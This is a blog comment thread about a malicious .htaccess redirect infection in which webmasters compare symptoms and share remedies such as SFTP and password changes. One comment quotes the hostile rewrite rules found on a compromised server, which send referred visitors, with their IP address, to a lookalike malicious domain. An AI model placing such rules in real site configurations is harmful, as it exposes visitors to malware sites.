Comments on: Bogus Antivirus 2009 .htaccess Exploit.

By: Le Cres

Le Cres — Sat, 12 Feb 2011 14:40:28 +0000

This mornig I discoverred this .htaccess file under all sub-directories of the Linux Server:

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://
RewriteCond %{HTTP_REFERER} !%{HTTP_HOST} RewriteRule . hxxp://g-oogl-e.com/%{REMOTE_ADDR}

Who is the author?

By: Ernie

Ernie — Sat, 25 Dec 2010 15:23:53 +0000

Thanks for the write-up. Christmas morning, and my gift.. A website being redirected. A combination of things brought me to your blog, so I wanted to say thanks.

By: Denis

Denis — Sun, 11 Apr 2010 09:00:17 +0000

Apperantly, read-only permissions won't work since in most cases this sort of hacks are done using stolen FTP credentials. You need to scan your computer for malware and then change all site password. And don't save your new passwords in FTP clients. If possible, switch to SFTP from FTP.

By: kevin dock

kevin dock — Wed, 07 Apr 2010 21:54:38 +0000

This has been driving me mad the last couple of weeks. My site has a .htaccess file that is continually modified with the redirects. I tried creating a blank version AND chmod thye file to READ ONLY access but this did not work. I have now changed the passwords to the site. Is this problem coming from my local machine and being passed to the web server or is the problem at the web server/hosting end ?

By: Denis

Denis — Sat, 02 Jan 2010 07:22:49 +0000

http://en.wikipedia.org/wiki/SSH_File_Transfer_Protocol

By: Wordpress/Website Security Exploits | Shoultes.net

Wordpress/Website Security Exploits | Shoultes.net — Sat, 02 Jan 2010 03:32:34 +0000

[...] http://blog.unmaskparasites.com/2008/12/05/bogus-antivirus-2009-htaccess-exploit/ [...]

By: webeveron

webeveron — Thu, 31 Dec 2009 12:18:11 +0000

what is SFTP ? plz let me know

By: Antivirus

Antivirus — Fri, 16 Oct 2009 15:30:27 +0000

This article is very helpful. How much protection do the 755 and 644 permissions provide? Will they singlehandedly protect my website from hackers, trojans, and viruses? If so, why has no one told me about them sooner? I like that I can use google to search for my website and see if it has been infected with a trojan, by whether or not the search engine allows access to it. I am glad that the number one search engine in the country is so trustworthy.

By: vincent

vincent — Wed, 29 Jul 2009 14:02:18 +0000

I do have a windows 2003 server that received an .htaccess files once or twice a week, because all the file a read-only, nothing happens except the paste of the .htaccess file. If read-only is not activated on files, some js a write into the file.

By: iHenshin

iHenshin — Wed, 18 Feb 2009 06:53:17 +0000

Wow this really helped me! Thanks. I’m a Webmaster but not that expert.

Thanks a million.